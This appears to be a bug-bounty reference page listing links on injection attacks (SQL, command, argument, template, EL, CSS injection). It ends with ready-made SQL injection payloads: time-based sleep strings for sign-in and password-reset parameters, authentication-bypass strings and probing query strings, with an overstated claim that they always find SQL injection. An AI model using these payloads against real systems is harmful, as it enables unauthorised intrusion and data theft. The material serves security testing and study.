Injection

References for Injection Attacks

Blogs / Articles:

• https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3

• https://threat.tevora.com/stop-collaborate-and-listen/ -Blind Command Injection - SSRF

• https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z

• https://gerbenjavado.com/manual-sql-injection-discovery-tips/

• Practical JSONP Injection - Practical JSONP Injection

• XSLT Server Side Injection Attacks https://contextis.com/blog/xslt-server-side-injection-attacks

• Log Injection - https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/

• Remote Code Execution with EL injection - https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

• Argument Injection - https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/

• Argument Injection - https://staaldraad.github.io/post/2019-11-24-argument-injection/

• Argument Injection - https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68

  • Video - https://www.youtube.com/watch?v=FHiJnw9TTX8

• AST Injection, Prototype Pollution to RCE - https://blog.p6.is/AST-Injection/#How-to-Detect

• SSTI - https://blog.isec.pl/beyond-ssti/

• https://bad-jubies.github.io/Blind-SQLi-1/

• Command Injection -https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z

• https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17

• CSS Injection - https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092

• https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1

• https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716

• https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b

• SQL Injection - https://twitter.com/rodoassis/status/1438186092486877190?s=20

• https://outpost24.com/blog/X-forwarded-for-SQL-injection

• How I Escalated a Time-Based SQL Injection to RCE

• https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398

Payloads / Cheatsheets:

• https://github.com/Gabriel-Labs/OOB-SQLi

Twitter Threads / Tips:

• https://github.com/xer0days/SQLi-Query-Tampering - https://twitter.com/Xer0Days/status/1292488714241941504?s=20

• 1. Time Based SQL Injection : Used payload: '+(select*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters [Like username, email, otp] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )

• Time based SQLi -> forgot password Endpoin1. Payload used: '%2b(select*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint

• SPEL Injection - https://twitter.com/h1pmnh/status/1425831338234589184?s=20

• EL Injection

Tools:

Other References:

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection